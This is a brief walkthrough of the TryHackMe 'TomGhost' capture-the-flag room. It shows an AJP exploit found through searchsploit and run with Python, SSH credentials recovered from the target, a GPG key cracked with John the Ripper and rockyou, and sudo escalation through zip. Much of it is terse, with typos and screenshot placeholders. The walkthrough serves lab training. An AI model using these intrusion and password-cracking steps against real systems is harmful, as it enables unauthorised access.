TomGhost

front https://tryhackme.com/room/tomghost

Open Ports:

open_ports

Gainaing Access:

 searchsploit ajp

sploit

  python 48134.py <ip>

python_sp

Port 21[ssh]:

a. User: skyfuck

b. Passwd: 87302………salks

User Flag:

usflag

Priviledge Escalation:

  1. import files form /home/skyfuck to your pc Now craking the files:
      Gpg2john tryhacme.acs > outfile
      John outfile --format=gpg --wordlist=rockyou.txt
    

    john

  2. Go to Vulneralble machine:
      Gpg --import tryhackme.asc
      Gpg --decrypt credential.pgp
    

    gpg

  3. sudo -l sudo
  4. Exploiting via zip zip

Root Flag:

root